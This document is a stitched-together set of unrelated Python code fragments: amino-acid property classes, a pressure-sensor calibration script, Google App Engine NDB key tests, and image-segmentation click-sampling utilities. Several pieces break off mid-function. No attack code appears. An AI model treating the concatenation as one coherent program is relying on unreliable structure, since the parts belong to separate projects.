# Essential AA
# Molecular weight 165.19 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 1 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 2.8 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 5.49
# pKa( alpha-COOH) 2.20
# pKa( alpha-NH2) 9.31
# CAS # 63-91-2
# PubChem ID 994
#
self.Hydropathy = 2.8
self.ResWeight = 109
self.name3L = 'PHE'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.n1 = 0
self.n2 = 0
self.ResVol = 189.9
self.SideChainVol = 189.9-54.1
class Trp(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'W')
# Tryptophan
# ##############
# Ph-NH-CH=C-CH2-CH(NH2)-COOH
# |________|
#
# contains an indole functional group.
# aromatic heterocyclic organic compound
# It has a bicyclic structure, consisting of a six-membered benzene ring fused to
# a five-membered nitrogen-containing pyrrole ring
#
# Essential AA
# Molecular weight 204.23 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.878 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index -0.9 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 5.89
# pKa( alpha-COOH) 2.46
# pKa( alpha-NH2) 9.41
# CAS # 73-22-3
# PubChem ID 6305
#
self.Hydropathy = -0.9
self.ResWeight = 148
self.name3L = 'TRP'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit when on a loop
self.size = 0 # Residue size (0:1) 0:ignor size, 1:Large residue
self.SpecialRes = {0:0} # Special characteristic of residue
self.n1 = 0
self.n2 = 0
self.ResVol = 227.8
self.SideChainVol = 227.8-54.1
class Met(AminoAcid):
def __init__(self):
AminoAcid.__init__(self,'M')
# Methionine
# ############
# CH3-S-(CH2)2-CH(NH2)-COOH
# sulfur-containing residue
# methyl donor R-CH3
# methionine is incorporated into the N-terminal position of all proteins
# in eukaryotes and archaea during translation, although it is usually removed
# by post-translational modification
#
# Essential AA
# Molecular weight 149.21 Da
# Non ploar
# Acidity - Natural
# Hydrophobicity 0.738 (Analytical Bio chemistry 193:11,72-82 Elsevier 1991)
# Hydrophathy index 1.9 (J.Mol.Bio(1982) 157, 105-132)
# Isoelectric point 5.74
# pKa( alpha-COOH) 2.13
# pKa( alpha-NH2) 9.28
# CAS # 63-68-3
# PubChem ID 876
#
self.Hydropathy = 1.9
self.ResWeight = 93
self.name3L = 'MET'
self.Hydrophobic = 1 # 1: Hydrophobic, 0: Hydrophilic
self.charge = 0
self.polar = 0
self.corner = 0 # Would prefer to be at a corner : give positive value
self.loop = 0 # cost/benefit | |
<reponame>bluthen/isadore_electronics
#!/usr/bin/python
# Copyright 2010-2019 <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#TODO: don't be so stupid and use dictionaries instead of all these list indexes!!
import matplotlib
# matplotlib.use('Agg')
import getopt
import csv
import numpy
import sys
import time
import traceback
import midsim
import StringIO
import datetime
import pylab
from matplotlib.backends.backend_pdf import PdfPages
def usage(p):
if not p:
p = sys.stderr
print >> p, "Usage: " + sys.argv[0] + " [OPTION]..."
print >> p, " -h, --help show this screen"
print >> p, " -v, --verbose output verbose debug output"
print >> p, " -p t,c override default pulling samples every t seconds, c many times,"
print >> p, " default is 0,300"
print >> p, " -r IPHOST;rp1:ra1 The port:address of the unit to use as pressure reference IPHOST; is optional"
print >> p, " -a IPHOST;p1:a1,IPHOST;p2:a2,... The list of unit IPHOST port:adress to calibrate "
print >> p, " IPHOST; is optional if missing assumes local mid"
print >> p, " Examples:"
print >> p, " -a 1:4602,3:5492,172.16.43.22:3201;1:9873"
print >> p, " -n Bypass statistical safeguard checks, in step3"
print >> p, " --step0 Only do step0"
print >> p, " --step1=fileout Only do step1 put output in 'fileout'"
print >> p, " --step2=filein,fileout Only do step2 using output from step1"
print >> p, " --step3=filein Only do step3 using output from step2"
print >> p, " --verify Only do verifying step"
print >> p, ""
print >> p, "-------------------------------------------------"
print >> p, "By default it goes through these steps:"
print >> p, " STEP0: Zero out calibration settings"
print >> p, " STEP1: Gather data"
print >> p, " STEP2: Calculate offset from data"
print >> p, " STEP3: Program units with new calculated offsets, correctly adjusts finding current offset"
print >> p, " VERIFY: Sample data gain verify offsets are valid, generate reports"
print >> p, ""
def parse_unit_args(arg):
pargs = [[[d for d in b.rsplit(':')] for b in c.rsplit(";")] for c in arg.split(",")]
try:
for i in range(len(pargs)):
a = pargs[i]
if len(a) > 1:
a[0] = ':'.join(a[0])
else:
a.insert(0, None)
pargs[i] = [a[0], int(a[1][0]), int(a[1][1])]
except:
print >> sys.stderr, 'ERROR: Unit argument is: IPHOST;PORT:ADDRESS or PORT:Address Examples seperated by commas'
print >> sys.stderr, ' 172.16.43.16:5200;1:3234,172.16.43.16:5200;1:3235 \n' \
' or \n' \
' 1:3234,1:3235\n' \
'You can mixe IPHOST with non-IPHOST.'
raise
return pargs
def main():
stats_threshold = [27, 1500, 24] # [Error stddev, pre cal allowed error, post cal allowed error]
config = {"verbose": False, "delay": 0, "counts": 300, "ref": [], "units": [], "stats_check": True, "step0": False,
"step1": [None, None], "step2": [None, None], "step3": [None, None], "verify": False,
"stats_threshold": stats_threshold}
try:
opts, args = getopt.getopt(sys.argv[1:], "hvp:r:a:n",
["help", "verbose", "step0", "step1=", "step2=", "step3=", "verify"])
except getopt.GetoptError, err:
print str(err)
usage(None)
sys.exit(1)
try:
for o, a in opts:
# print o, a
if o in ("-h", "--help"):
usage(sys.stdout)
sys.exit(0)
elif o in ("-v", "--verbose"):
config["verbose"] = True
elif o in ("-p",):
a = [int(a) for a in a.split(",")]
config["delay"] = a[0]
config["counts"] = a[1]
elif o in ("-r",):
config["ref"] = parse_unit_args(a)[0]
elif o in ("-a",):
config["units"] = parse_unit_args(a)
elif o in ("-n",):
config["stats_check"] = False
elif o in ("--step0",):
config["step0"] = True
elif o in ("--step1",):
config["step1"][1] = a
elif o in ("--step2",):
config["step2"] = a.split(",")
config["step2"][0] = parse_step2in(config["step2"][0])
elif o in ("--step3",):
config["step3"] = a.split(",")
config["step3"][0] = parse_step3in(config["step3"][0])
elif o in ("--verify",):
config["verify"] = True
except SystemExit as e:
sys.exit(e)
except:
print >> sys.stderr, 'ERROR: Invalid option argument.'
print >> sys.stderr, traceback.format_exc()
print >> sys.stderr
usage(None)
sys.exit(13)
if len(config["units"]) == 0:
print >> sys.stderr, "ERROR: No units provided with -a"
usage(None)
sys.exit(11)
if len(config["ref"]) != 3:
print >> sys.stderr, "ERROR: Missing reference information -r"
usage(None)
sys.exit(12)
# Lets start
if config["verify"]:
step4(config)
elif config["step3"][0]:
step3(config)
elif config["step2"][0]:
step2(config)
elif config["step1"][1]:
step1(config)
elif config["step0"]:
step0(config)
else:
step0(config)
step1(config)
step2(config)
step3(config)
step4(config)
sys.exit(0)
def set_cal(hostipport, port, address, value):
outstream = StringIO.StringIO()
remote = ""
if hostipport:
remote = "-r "+hostipport
args = (
"%s %s -f csv -p %d -a %d -t %s --set-cal=%d" % ("midsim.py", remote, port, address, "pressurewide", value)
).split()
midsim.midsim(args, outstream)
mout = outstream.getvalue()
outstream.close()
v = int(mout.rstrip().split(",")[1])
if v != value:
print >> sys.stderr, "ERROR: Unit calibration was not set correctly: sp = %d != pv = %d" % (value, v)
sys.exit(7)
def step0(config):
print "Zeroing out calibration settings..."
for unit in config["units"]:
hostipport = unit[0]
port = unit[1]
address = unit[2]
set_cal(hostipport, port, address, 0)
def step1_diffport(config):
# [[Port, Unit_ADDRESS, REF_VALUE, UNIT_VALUE, REF_VALUE], ...]
alldata = []
for i in xrange(config["counts"]):
sys.stdout.write("Sample %d/%d \r" % (i + 1, config["counts"]))
sys.stdout.flush()
for unit in config["units"]:
# Get Reference value
data = []
data.extend([unit[0], unit[1], unit[2]])
if unit[0] is config["ref"][0] and unit[1] == config["ref"][1]:
outstream = StringIO.StringIO()
remote = ""
if unit[0]:
remote = "-r "+unit[0]
midsim.midsim(["midsim.py"] + ("%s -f csv -p %d -a %d,%d,%d -t %s" % (
remote, config["ref"][1], config["ref"][2], unit[2], config["ref"][2], "pressurewide")).split(),
outstream)
mout = outstream.getvalue()
outstream.close()
data.extend([int(c) for c in mout.rstrip().split(",")[1:]])
alldata.append(data)
else:
outstream = StringIO.StringIO()
remote = ""
if config["ref"][0]:
remote = "-r "+config["ref"][0]
midsim.midsim(("%s %s -f csv -p %d -a %d -t %s" % (
"midsim.py", remote, config["ref"][1], config["ref"][2], "pressurewide")).split(), outstream)
mout = outstream.getvalue()
outstream.close()
data.append(int(mout.rstrip().split(",")[1]))
# Get other unit values
outstream = StringIO.StringIO()
remote = ""
if unit[0]:
remote = "-r "+unit[0]
args = "%s %s -f csv -p %d -a %d -t %s" % ("midsim.py", remote, unit[1], unit[2], "pressurewide")
args = args.split()
midsim.midsim(args, outstream)
mout = outstream.getvalue()
outstream.close()
data.append(int(mout.rstrip().split(",")[1]))
# Get Reference value
outstream = StringIO.StringIO()
remote = ""
if config["ref"][0]:
remote = "-r "+config["ref"][0]
args = "%s %s -f csv -p %d -a %d -t %s" % (
"midsim.py", remote, config["ref"][1], config["ref"][2], "pressurewide")
args = args.split()
midsim.midsim(args, outstream)
mout = outstream.getvalue()
outstream.close()
data.append(int(mout.rstrip().split(",")[1]))
alldata.append(data)
time.sleep(config["delay"])
print
return alldata
def step1(config):
# Gather Data
print "Gathering Samples..."
sameports = True
port = config["units"][0][1]
for unit in config["units"]:
if unit[0] is not config["units"][0][0] or unit[1] != port:
sameports = False
break
if sameports and (config["ref"][0] is not config["units"][0][0] or config["ref"][1] != port):
sameports = False
# [[Port, Unit_ADDRESS, REF_VALUE, UNIT_VALUE, REF_VALUE], ...]
if sameports:
# XXX: Make a super fast sampler
alldata = step1_diffport(config)
else:
alldata = step1_diffport(config)
if config["step1"][1] is not None:
with open(config["step1"][1], 'wb') as f:
for row in alldata:
f.write("%s,%d,%d,%d,%d,%d\n" % (row[0], row[1], row[2], row[3], row[4], row[5]))
sys.exit(0)
else:
config["step2"][0] = alldata
def parse_step2in(filename):
with open(filename, 'rb') as f:
sr = csv.reader(f, delimiter=',', quotechar='"')
alldata = []
for row in sr:
d = [row[0], int(row[1]), int(row[2]), int(row[3]), int(row[4]), int(row[5])]
if d[0] == 'None':
d[0] = None
alldata.append(d)
return alldata
def step2(config):
print "Calculating States..."
# sort step2 in data
# [[port, address, [[r1, v1, r2], ...]]]
sorted_data = []
for row in config["step2"][0]:
found = False
for srow in sorted_data:
if srow[0] is row[0] and srow[1] == row[1] and srow[2] == row[2]:
srow[3].append([row[3], row[4], row[5]])
found = True
break
if not found:
sorted_data.append([row[0], row[1], row[2], [[row[3], row[4], row[5]]]])
# Calculate Offsets
# [ [port, address, mean_error, stddev_error, minerror, maxerror, suggested_offset] ]
calculations = []
for row in sorted_data:
zdata = zip(*row[3])
r = (numpy.array(zdata[0]) + numpy.array(zdata[2])) / 2.0
me = r - numpy.array(zdata[1])
mean_error = numpy.mean(me)
stddev_error = numpy.std(me)
minerror = numpy.min(me)
maxerror = numpy.max(me)
suggested_offset = round(mean_error)
calculations.append([row[0], row[1], row[2], mean_error, stddev_error, minerror, maxerror, suggested_offset])
if config["step2"][1] is not None:
with open(config["step2"][1], 'wb') as f:
for row in calculations:
f.write("%s,%d,%d,%f,%f,%f,%f,%d\n" % (row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]))
sys.exit(0)
else:
config["step3"][0] = calculations
def | |
<gh_stars>10-100
#!/usr/bin/env python
#
# Copyright 2007 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for key.py."""
import base64
import collections
import datetime
import os
import pickle
import sortedcontainers
from google.appengine.ext.ndb import key
from google.appengine.ext.ndb import model
from google.appengine.ext.ndb import tasklets
from google.appengine.ext.ndb import test_utils
import six
from six.moves import range
from six.moves import zip
from google.appengine.api import datastore_errors
from google.appengine.api import datastore_types
from google.appengine.datastore import entity_bytes_pb2 as entity_pb2
from absl.testing import absltest as unittest
class KeyTests(test_utils.NDBTest):
the_module = key
def testShort(self):
k0 = key.Key('Kind', None)
self.assertEqual(k0.flat(), ('Kind', None))
k1 = key.Key('Kind', 1)
self.assertEqual(k1.flat(), ('Kind', 1))
k2 = key.Key('Parent', 42, 'Kind', 1)
self.assertEqual(k2.flat(), ('Parent', 42, 'Kind', 1))
def testFlat(self):
flat = ('Kind', 1)
pairs = tuple((flat[i], flat[i + 1]) for i in range(0, len(flat), 2))
k = key.Key(flat=flat)
self.assertEqual(k.pairs(), pairs)
self.assertEqual(k.flat(), flat)
self.assertEqual(k.kind(), 'Kind')
def testFlatLong(self):
flat = ('Kind', 1, 'Subkind', 'foobar')
pairs = tuple((flat[i], flat[i + 1]) for i in range(0, len(flat), 2))
k = key.Key(flat=flat)
self.assertEqual(k.pairs(), pairs)
self.assertEqual(k.flat(), flat)
self.assertEqual(k.kind(), 'Subkind')
def testSerialized(self):
flat = ['Kind', 1, 'Subkind', 'foobar']
r = entity_pb2.Reference()
r.app = 'ndb-test-app-id'
e = r.path.element.add()
e.type = flat[0]
e.id = flat[1]
e = r.path.element.add()
e.type = flat[2]
e.name = flat[3]
serialized = r.SerializeToString()
ref_bytes = six.ensure_binary(r.SerializeToString())
urlsafe = base64.urlsafe_b64encode(ref_bytes).rstrip(b'=')
k = key.Key(flat=flat)
self.assertEqual(k.serialized(), serialized)
self.assertEqual(k.urlsafe(), urlsafe)
self.assertEqual(k.reference(), r)
k = key.Key(urlsafe=urlsafe)
self.assertEqual(k.serialized(), serialized)
self.assertEqual(k.urlsafe(), urlsafe)
self.assertEqual(k.reference(), r)
k = key.Key(serialized=serialized)
self.assertEqual(k.serialized(), serialized)
self.assertEqual(k.urlsafe(), urlsafe)
self.assertEqual(k.reference(), r)
k = key.Key(reference=r)
self.assertIsNot(k.reference(), r)
self.assertEqual(k.serialized(), serialized)
self.assertEqual(k.urlsafe(), urlsafe)
self.assertEqual(k.reference(), r)
k = key.Key(reference=r, app=r.app, namespace='')
self.assertIsNot(k.reference(), r)
self.assertEqual(k.serialized(), serialized)
self.assertEqual(k.urlsafe(), urlsafe)
self.assertEqual(k.reference(), r)
k1 = key.Key('A', 1)
self.assertEqual(k1.urlsafe(), b'ag9uZGItdGVzdC1hcHAtaWRyBwsSAUEYAQw')
k2 = key.Key(urlsafe=k1.urlsafe())
self.assertEqual(k1, k2)
def testId(self):
k1 = key.Key('Kind', 'foo', app='app1', namespace='ns1')
self.assertEqual(k1.id(), 'foo')
k2 = key.Key('Subkind', 42, parent=k1)
self.assertEqual(k2.id(), 42)
k3 = key.Key('Subkind', 'bar', parent=k2)
self.assertEqual(k3.id(), 'bar')
k4 = key.Key('Subkind', None, parent=k3)
self.assertEqual(k4.id(), None)
def testIdentity(self):
test_kind, test_id = 'test-kind', 'test-id'
k = key.Key(test_kind, test_id)
with self.subTest(name='Kind'):
self.assertEqual(k.kind(), test_kind)
with self.subTest(name='ID'):
self.assertEqual(k.id(), test_id)
def testStringId(self):
k1 = key.Key('Kind', 'foo', app='app1', namespace='ns1')
self.assertEqual(k1.string_id(), 'foo')
k2 = key.Key('Subkind', 'bar', parent=k1)
self.assertEqual(k2.string_id(), 'bar')
k3 = key.Key('Subkind', 42, parent=k2)
self.assertEqual(k3.string_id(), None)
k4 = key.Key('Subkind', None, parent=k3)
self.assertEqual(k4.string_id(), None)
def testIntegerId(self):
k1 = key.Key('Kind', 42, app='app1', namespace='ns1')
self.assertEqual(k1.integer_id(), 42)
k2 = key.Key('Subkind', 43, parent=k1)
self.assertEqual(k2.integer_id(), 43)
k3 = key.Key('Subkind', 'foobar', parent=k2)
self.assertEqual(k3.integer_id(), None)
k4 = key.Key('Subkind', None, parent=k3)
self.assertEqual(k4.integer_id(), None)
def testParent(self):
p = key.Key('Kind', 1, app='app1', namespace='ns1')
self.assertEqual(p.parent(), None)
k = key.Key('Subkind', 'foobar', parent=p)
self.assertEqual(k.flat(), ('Kind', 1, 'Subkind', 'foobar'))
self.assertEqual(k.parent(), p)
k = key.Key(
'Subkind', 'foobar', parent=p, app=p.app(), namespace=p.namespace())
self.assertEqual(k.flat(), ('Kind', 1, 'Subkind', 'foobar'))
self.assertEqual(k.parent(), p)
def testRoot(self):
p = key.Key('Kind', 1, app='app1', namespace='ns1')
self.assertEqual(p.root(), p)
k = key.Key('Subkind', 'foobar', parent=p)
self.assertEqual(k.flat(), ('Kind', 1, 'Subkind', 'foobar'))
self.assertEqual(k.root(), p)
k2 = key.Key(
'Subsubkind', 42, parent=k, app=p.app(), namespace=p.namespace())
self.assertEqual(k2.flat(),
('Kind', 1, 'Subkind', 'foobar', 'Subsubkind', 42))
self.assertEqual(k2.root(), p)
def testRepr_Inferior(self):
k = key.Key('Kind', 1, 'Subkind', 'foobar')
self.assertEqual(repr(k), "Key('Kind', 1, 'Subkind', 'foobar')")
self.assertEqual(repr(k), str(k))
def testRepr_Toplevel(self):
k = key.Key('Kind', 1)
self.assertEqual(repr(k), "Key('Kind', 1)")
def testRepr_Incomplete(self):
k = key.Key('Kind', None)
self.assertEqual(repr(k), "Key('Kind', None)")
def testRepr_UnicodeKind(self):
k = key.Key(u'\u1234', 1)
if six.PY2:
self.assertEqual(repr(k), "Key('\\xe1\\x88\\xb4', 1)")
else:
self.assertEqual(repr(k), u"Key('\u1234', 1)")
def testRepr_UnicodeId(self):
k = key.Key('Kind', u'\u1234')
if six.PY2:
self.assertEqual(repr(k), "Key('Kind', '\\xe1\\x88\\xb4')")
else:
self.assertEqual(repr(k), u"Key('Kind', '\u1234')")
def testRepr_App(self):
k = key.Key('Kind', 1, app='foo')
self.assertEqual(repr(k), "Key('Kind', 1, app='foo')")
def testRepr_Namespace(self):
k = key.Key('Kind', 1, namespace='foo')
self.assertEqual(repr(k), "Key('Kind', 1, namespace='foo')")
def testUnicode(self):
flat_input = (u'Kind\u1234', 1, 'Subkind', u'foobar\u4321')
flat = (six.ensure_str(flat_input[0]), flat_input[1], flat_input[2],
six.ensure_str(flat_input[3]))
pairs = tuple((flat[i], flat[i + 1]) for i in range(0, len(flat), 2))
k = key.Key(flat=flat_input)
self.assertEqual(k.pairs(), pairs)
self.assertEqual(k.flat(), flat)
r = k.reference()
serialized = k.serialized()
urlsafe = k.urlsafe()
key.Key(urlsafe=urlsafe.decode('utf8'))
key.Key(serialized=serialized.decode('utf8'))
key.Key(reference=r)
r = entity_pb2.Reference()
r.app = 'ndb-test-app-id'
e = r.path.element.add()
e.type = flat[0]
e.name = flat[3]
k = key.Key(reference=r)
self.assertEqual(k.reference(), r)
def testHash(self):
flat = ['Kind', 1, 'Subkind', 'foobar']
pairs = [(flat[i], flat[i + 1]) for i in range(0, len(flat), 2)]
k = key.Key(flat=flat)
self.assertEqual(hash(k), hash(tuple(pairs)))
def testOrdering(self):
a = key.Key(app='app2', namespace='ns2', flat=('kind1', 1))
b = key.Key(app='app2', namespace='ns1', flat=('kind1', 1))
c = key.Key(app='app1', namespace='ns1', flat=('kind1', 1))
d = key.Key(app='app1', namespace='ns1', flat=('kind1', 2))
e = key.Key(app='app1', namespace='ns1', flat=('kind1', 'e'))
f = key.Key(app='app1', namespace='ns1', flat=('kind1', 'f'))
g = key.Key(app='app1', namespace='ns1', flat=('kind2', 'f', 'x', 1))
h = key.Key(app='app1', namespace='ns1', flat=('kind2', 'f', 'x', 2))
expected = [c, d, e, f, g, h, b, a]
actual = sorted([a, b, c, d, e, f, g, h])
self.assertEqual(actual, expected)
for i in range(len(actual)):
for j in range(len(actual)):
self.assertEqual(actual[i] < actual[j], i < j)
self.assertEqual(actual[i] <= actual[j], i <= j)
self.assertEqual(actual[i] > actual[j], i > j)
self.assertEqual(actual[i] >= actual[j], i >= j)
self.assertEqual(actual[i] == actual[j], i == j)
self.assertEqual(actual[i] != actual[j], i != j)
def testUniqueIncomplete(self):
p0 = None
p1 = key.Key('bar', 1)
for p in p0, p1:
a = key.Key('foo', 0, parent=p)
b = key.Key('foo', '', parent=p)
c = key.Key('foo', None, parent=p)
self.assertEqual(a, b)
self.assertEqual(b, c)
self.assertEqual(c, a)
for x in a, b, c:
self.assertEqual(x.id(), None)
self.assertEqual(x.string_id(), None)
self.assertEqual(x.integer_id(), None)
self.assertEqual(x.pairs()[-1], ('foo', None))
self.assertEqual(x.flat()[-1], None)
self.assertEqual(x.urlsafe(), c.urlsafe())
def testIncomplete(self):
key.Key(flat=['Kind', None])
self.assertRaises(
datastore_errors.BadArgumentError,
key.Key,
flat=['Kind', None, 'Subkind', 1])
self.assertRaises(TypeError, key.Key, flat=['Kind', ()])
def testKindFromModel(self):
class M(model.Model):
pass
class N(model.Model):
@classmethod
def _get_kind(cls):
return 'NN'
k = key.Key(M, 1)
self.assertEqual(k, key.Key('M', 1))
k = key.Key('X', 1, N, 2, 'Y', 3)
self.assertEqual(k, key.Key('X', 1, 'NN', 2, 'Y', 3))
def testKindFromBadValue(self):
self.assertRaises(Exception, key.Key, 42, 42)
def testDeleteHooksCalled(self):
test = self
self.pre_counter = 0
self.post_counter = 0
class HatStand(model.Model):
@classmethod
def _pre_delete_hook(cls, key):
test.pre_counter += 1
if test.pre_counter == 1:
self.assertEqual(self.key, key)
@classmethod
def _post_delete_hook(cls, key, future):
test.post_counter += 1
self.assertEqual(self.key, key)
self.assertIs(future.get_result(), None)
furniture = HatStand()
key = furniture.put()
self.key = key
self.assertEqual(self.pre_counter, 0, 'Pre delete hook called early')
future = key.delete_async()
self.assertEqual(self.pre_counter, 1, 'Pre delete hook not called')
self.assertEqual(self.post_counter, 0, 'Post delete hook called early')
future.get_result()
self.assertEqual(self.post_counter, 1, 'Post delete hook not called')
new_furniture = [HatStand() for _ in range(10)]
keys = [furniture.put() for furniture in new_furniture]
multi_future = model.delete_multi_async(keys)
self.assertEqual(self.pre_counter, 11,
'Pre delete hooks not called on delete_multi')
self.assertEqual(self.post_counter, 1,
'Post delete hooks called early on delete_multi')
for fut, key in zip(multi_future, keys):
self.key = key
fut.get_result()
self.assertEqual(self.post_counter, 11,
'Post delete hooks not called on delete_multi')
def testNoDefaultDeleteCallback(self):
ctx = tasklets.get_context()
ctx.set_cache_policy(False)
class EmptyModel(model.Model):
pass
entity = EmptyModel()
entity.put()
fut = entity.key.delete_async()
self.assertFalse(fut._immediate_callbacks,
'Delete hook queued default no-op.')
def testGetHooksCalled(self):
test = self
self.pre_counter = 0
self.post_counter = 0
class HatStand(model.Model):
@classmethod
def _pre_get_hook(cls, key):
test.pre_counter += 1
if test.pre_counter == 1:
self.assertEqual(key, self.key)
@classmethod
def _post_get_hook(cls, key, future):
test.post_counter += 1
self.assertEqual(key, self.key)
self.assertEqual(future.get_result(), self.entity)
furniture = HatStand()
self.entity = furniture
key = furniture.put()
self.key = key
self.assertEqual(self.pre_counter, 0, 'Pre get hook called early')
future = key.get_async()
self.assertEqual(self.pre_counter, 1, 'Pre get hook not called')
self.assertEqual(self.post_counter, 0, 'Post get hook called early')
future.get_result()
self.assertEqual(self.post_counter, 1, 'Post get hook not called')
new_furniture = [HatStand() for _ in range(10)]
keys = [furniture.put() for furniture in new_furniture]
multi_future = model.get_multi_async(keys)
self.assertEqual(self.pre_counter, 11,
'Pre get hooks not called on get_multi')
self.assertEqual(self.post_counter, 1,
'Post get hooks called early on get_multi')
for fut, key, entity in zip(multi_future, keys, new_furniture):
self.key = key
self.entity = entity
fut.get_result()
self.assertEqual(self.post_counter, 11,
'Post get hooks not called on get_multi')
def testMonkeyPatchHooks(self):
hook_attr_names = ('_pre_get_hook', '_post_get_hook', '_pre_delete_hook',
'_post_delete_hook')
original_hooks = {}
for name in hook_attr_names:
original_hooks[name] = getattr(model.Model, name)
self.pre_get_flag = False
self.post_get_flag = False
self.pre_delete_flag = False
self.post_delete_flag = False
class HatStand(model.Model):
@classmethod
def _pre_get_hook(cls, unused_key):
self.pre_get_flag = True
@classmethod
def _post_get_hook(cls, unused_key, unused_future):
self.post_get_flag = True
@classmethod
def _pre_delete_hook(cls, unused_key):
self.pre_delete_flag = True
@classmethod
def _post_delete_hook(cls, unused_key, unused_future):
self.post_delete_flag = True
for name in hook_attr_names:
hook = getattr(HatStand, name)
setattr(model.Model, name, hook)
try:
| |
import itertools as it
import os
import random
from scipy.ndimage import distance_transform_edt
import cv2
import numpy as np
from skimage import color, morphology
from datasets.Util.flo_Reader import read_flo_file
from datasets.Util.python_pfm import readPFM
D = 40
D_MARGIN = 5
# Number of positive clicks to sample
Npos = 5
# Number of negative clicks to sample using strategy 1, 2 and 3 respectively of https://arxiv.org/abs/1603.04042
Nneg1 = 10
Nneg2 = 5
Nneg3 = 10
def unique_list(l):
res = []
for x in l:
if x not in res:
res.append(x)
return res
def create_index_image(height, width):
import tensorflow as tf
y = tf.range(height)
x = tf.range(width)
grid = tf.meshgrid(x, y)
index_img = tf.stack((grid[1], grid[0]), axis=2)
return index_img
def smart_shape(x):
import tensorflow as tf
shape = x.get_shape().as_list()
tf_shape = tf.shape(x)
for i, s in enumerate(shape):
if s is None:
shape[i] = tf_shape[i]
return shape
def read_pfm(fn):
return readPFM(fn)[0]
def username():
return os.environ["USER"]
def _postprocess_flow(x, flow_as_angle):
if flow_as_angle:
assert False, "not implemented yet"
else:
# divide by 20 to get to a more useful range
x /= 20.0
return x
def load_flow_from_pfm(fn, flow_as_angle=False):
# 3rd channel is all zeros
flow = read_pfm(fn)[:, :, :2]
flow = _postprocess_flow(flow, flow_as_angle)
return flow
def load_flow_from_flo(fn, flow_as_angle):
flow = read_flo_file(fn)
flow = _postprocess_flow(flow, flow_as_angle)
return flow
def get_masked_image(img, mask, multiplier=0.6):
"""
:param img: The image to be masked.
:param mask: Binary mask to be applied. The object should be represented by 1 and the background by 0
:param multiplier: Floating point multiplier that decides the colour of the mask.
:return: Masked image
"""
img_mask = np.zeros_like(img)
indices = np.where(mask == 1)
img_mask[indices[0], indices[1], 1] = 1
img_mask_hsv = color.rgb2hsv(img_mask)
img_hsv = color.rgb2hsv(img)
img_hsv[indices[0], indices[1], 0] = img_mask_hsv[indices[0], indices[1], 0]
img_hsv[indices[0], indices[1], 1] = img_mask_hsv[indices[0], indices[1], 1] * multiplier
return color.hsv2rgb(img_hsv)
def get_masked_image_hsv(img_hsv, mask, multiplier=0.6):
"""
:param img_hsv: The hsv image to be masked.
:param mask: Binary mask to be applied. The object should be represented by 1 and the background by 0
:param multiplier: Floating point multiplier that decides the colour of the mask.
:return: Masked image
"""
img_mask_hsv = np.zeros_like(img_hsv)
result_image = np.copy(img_hsv)
indices = np.where(mask == 1)
img_mask_hsv[indices[0], indices[1], :] = [0.33333333333333331, 1.0, 0.0039215686274509803]
result_image[indices[0], indices[1], 0] = img_mask_hsv[indices[0], indices[1], 0]
result_image[indices[0], indices[1], 1] = img_mask_hsv[indices[0], indices[1], 1] * multiplier
return color.hsv2rgb(result_image)
def create_distance_transform(img, label, raw_label, strategy, ignore_classes, old_label=None):
u0, neg_clicks = get_neg_dst_transform(raw_label[:, :, 0], img, 1, strategy, ignore_classes)
u1, pos_clicks = get_pos_dst_transform(label[:, :, 0], img, 1)
num_clicks = len(neg_clicks) + len(pos_clicks)
return u0.astype(np.float32), u1.astype(np.float32), num_clicks
def geo_dist(img, pts):
# Import these only on demand since pyximport interferes with pycocotools
import pyximport
pyximport.install()
from datasets.Util import sweep
img = np.copy(img) / 255.0
#G = nd.gaussian_gradient_magnitude(img, 1.0)
img = cv2.GaussianBlur(img, (3,3), 1.0)
#G = cv2.Laplacian(img,cv2.CV_64F)
sobelx = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=5)
sobely = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=5)
sobel_abs = cv2.addWeighted(sobelx, 0.5, sobely, 0.5, 0)
sobel_abs = (sobel_abs[:, :, 0] ** 2 + sobel_abs[:, :, 1] ** 2 + sobel_abs[:, :, 2] ** 2) ** (1 / 2.0)
#G = (G[:, :, 0] ** 2 + G[:, :, 1] ** 2 + G[:, :, 2] ** 2) ** (1 / 2.0)
# c = 1 + G * 200
# c = G / np.max(G)
#c=sobel_abs / 255.0
c=1+sobel_abs
# plt.imshow(sobel_abs)
# plt.colorbar()
# plt.show()
dt = np.zeros_like(c)
dt[:] = 1000
dt[pts] = 0
sweeps = [dt, dt[:, ::-1], dt[::-1], dt[::-1, ::-1]]
costs = [c, c[:, ::-1], c[::-1], c[::-1, ::-1]]
for i, (a, c) in enumerate(it.cycle(list(zip(sweeps, costs)))):
# print i,
if sweep.sweep(a, c) < 1.0 or i >= 40:
break
return dt
def get_pos_dst_transform(label_unmodified, img, instance, old_label=None, dt_method="edt"):
